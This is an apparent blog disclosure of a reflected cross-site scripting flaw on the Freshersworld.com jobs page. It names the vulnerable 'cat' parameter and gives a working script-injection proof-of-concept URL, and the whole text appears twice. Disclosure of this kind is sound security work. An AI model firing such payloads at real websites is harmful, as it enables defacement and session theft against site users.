Website/Vendor: Freshersworld.com
Vendor notified at: 31/12/2008
URL: http://freshersworld.com/jobs/catjobs.asp?cat=Software
Description: The nature of the XSS was very simple and that's why very easily exploitable.
If a query like http://freshersworld.com/jobs/catjobs.asp?cat=>'><ScRiPt%20%0a%0d>alert('Testing')%3B</ScRiPt> is supplied the XSS is executed on the page.
Now exploiting it is a play for any 'Hacker's Child' ! ;)
![](//4.bp.blogspot.com/_JJhUUN0dCKE/SWHUFxVp9SI/AAAAAAAAACY/YAZ1StKQf08/s320/freshersworld_XSS.jpg)
![](//3.bp.blogspot.com/_JJhUUN0dCKE/SWNItGMdDaI/AAAAAAAAADE/ufnT3TLcBQY/s320/freshersworld_deface.jpg)
It has been listed on www.xssed.com
Vendor notified at: 31/12/2008
URL: http://freshersworld.com/jobs/catjobs.asp?cat=Software
Description: The nature of the XSS was very simple and that's why very easily exploitable.
If a query like http://freshersworld.com/jobs/catjobs.asp?cat=>'><ScRiPt%20%0a%0d>alert('Testing')%3B</ScRiPt> is supplied the XSS is executed on the page.
Now exploiting it is a play for any 'Hacker's Child' ! ;)
![](http://4.bp.blogspot.com/_JJhUUN0dCKE/SWHUFxVp9SI/AAAAAAAAACY/YAZ1StKQf08/s320/freshersworld_XSS.jpg)
![](http://3.bp.blogspot.com/_JJhUUN0dCKE/SWNItGMdDaI/AAAAAAAAADE/ufnT3TLcBQY/s320/freshersworld_deface.jpg)
It has been listed on www.xssed.com
Comments